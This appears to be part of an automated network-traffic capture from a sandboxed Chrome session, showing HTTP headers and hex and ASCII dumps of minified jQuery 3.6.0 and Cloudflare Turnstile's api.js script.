                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:48 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Age: 1663354
                                                            Date: Mon, 06 Jan 2025 15:53:48 GMT
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740070-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 0
                                                            X-Timer: S1736178829.555138,VS0,VE1
                                                            Vary: Accept-Encoding
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-06 15:53:48 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.449762104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:49 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:49 UTC471INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:49 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce2123c9d5e62-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:49 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
